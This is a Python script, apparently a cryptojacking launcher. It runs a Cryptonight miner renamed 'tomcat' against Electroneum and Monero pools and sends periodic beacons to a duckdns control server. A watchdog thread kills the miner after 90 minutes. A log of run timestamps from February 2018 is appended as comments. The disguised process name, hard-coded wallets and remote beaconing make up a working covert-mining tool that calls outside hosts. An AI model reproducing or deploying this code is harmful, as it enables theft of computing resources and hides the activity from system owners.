import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:27:06.658237
#2018-02-17 17:16:02.049801
#2018-02-17 19:03:05.968607
#2018-02-17 20:52:06.632344
#2018-02-17 22:39:06.369772
#2018-02-18 00:24:06.243772
#2018-02-18 02:15:06.672256
#2018-02-18 04:03:07.780643
#2018-02-18 05:52:05.771669
#2018-02-18 07:43:05.989782
#2018-02-18 09:31:03.739874
#2018-02-18 11:17:05.867483
#2018-02-18 13:03:06.606393
#2018-02-18 14:52:01.336877
#2018-02-18 16:40:04.220001
#2018-02-18 18:29:03.710476
#2018-02-18 20:16:05.915027
#2018-02-18 22:01:06.096280
#2018-02-18 23:50:07.693088
#2018-02-19 01:36:05.708789
#2018-02-19 03:24:05.310678
#2018-02-19 05:09:01.596352
#2018-02-19 06:56:01.333177
#2018-02-19 08:44:08.110307
#2018-02-19 10:34:06.074400
#2018-02-19 12:21:08.010328
#2018-02-19 14:09:06.370010
#2018-02-19 15:59:05.674471
#2018-02-19 17:48:09.452827
#2018-02-19 19:35:09.363478
#2018-02-19 21:24:01.671390
#2018-02-19 23:09:07.361856
#2018-02-20 00:54:03.505575
#2018-02-20 02:44:04.326209
#2018-02-20 04:34:05.382624
#2018-02-20 06:18:07.131886
#2018-02-20 08:03:04.594082
#2018-02-20 09:48:06.777719
#2018-02-20 11:31:09.757416
#2018-02-20 13:17:05.414343
#2018-02-20 15:03:09.352433
#2018-02-20 16:48:08.332801
#2018-02-20 18:35:12.178653
#2018-02-20 20:26:09.547545
#2018-02-20 22:11:04.950137
#2018-02-20 23:53:06.553747
#2018-02-21 01:38:04.874785
#2018-02-21 03:24:08.176768
#2018-02-21 05:13:01.792794
#2018-02-21 07:01:07.901852
#2018-02-21 08:46:06.579882
#2018-02-21 10:32:03.845921
#2018-02-21 12:19:09.270018
#2018-02-21 14:07:01.999290
#2018-02-21 15:52:14.791342
#2018-02-21 17:43:04.901847
#2018-02-21 19:28:01.383759
#2018-02-21 21:16:07.164875
#2018-02-21 23:02:05.617747
#2018-02-22 00:49:03.823113
#2018-02-22 02:37:03.929178
#2018-02-22 04:22:07.673400
#2018-02-22 06:08:05.655432
#2018-02-22 07:53:07.560939
#2018-02-22 09:42:07.626490
#2018-02-22 11:27:04.528886
#2018-02-22 13:12:08.725054
#2018-02-22 15:01:07.718347
#2018-02-22 16:45:11.052966
#2018-02-22 18:32:04.830960
#2018-02-22 20:24:09.062625
#2018-02-22 22:10:08.136461
#2018-02-22 23:56:04.068103
#2018-02-23 01:44:08.060024
#2018-02-23 03:34:05.526300
#2018-02-23 05:18:01.809273
#2018-02-23 07:04:05.960165
#2018-02-23 08:53:01.774840
#2018-02-23 11:12:05.664449
#2018-02-23 13:05:05.467570
#2018-02-23 14:49:09.208806
#2018-02-23 16:38:05.551799
#2018-02-23 18:25:09.937496
#2018-02-23 20:09:07.361981
#2018-02-23 22:00:01.890931
#2018-02-23 23:47:09.110957
#2018-02-24 01:33:05.532302
#2018-02-24 03:22:02.172237
#2018-02-24 05:07:01.699673
#2018-02-24 06:55:08.425289
#2018-02-24 08:44:03.912243
#2018-02-24 10:39:01.562479
#2018-02-24 12:24:07.690915
#2018-02-24 14:18:01.465363
#2018-02-24 16:04:07.049887
#2018-02-24 17:56:01.660395
#2018-02-24 19:43:07.277331
#2018-02-24 21:31:01.445982
#2018-02-25 00:16:01.714396
#2018-02-25 04:02:05.524179
#2018-02-25 07:34:05.660302